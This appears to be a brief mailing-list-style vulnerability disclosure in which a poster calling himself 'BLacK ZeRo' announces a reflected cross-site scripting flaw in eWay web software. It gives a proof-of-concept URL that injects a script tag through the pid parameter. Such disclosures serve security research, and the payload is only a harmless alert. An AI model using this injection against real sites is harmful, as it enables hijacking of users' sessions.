hey guys .. check out this new xss i just found ;P Vulnerable : eWay web : http://www.eway.no/eway XSS : http://127.0.0.1/path/default.aspx?pid="><script>alert('bl4ck')</script> Discovered By BLacK ZeRo bL4ck@xxxxxxxxxxx Best regards ,,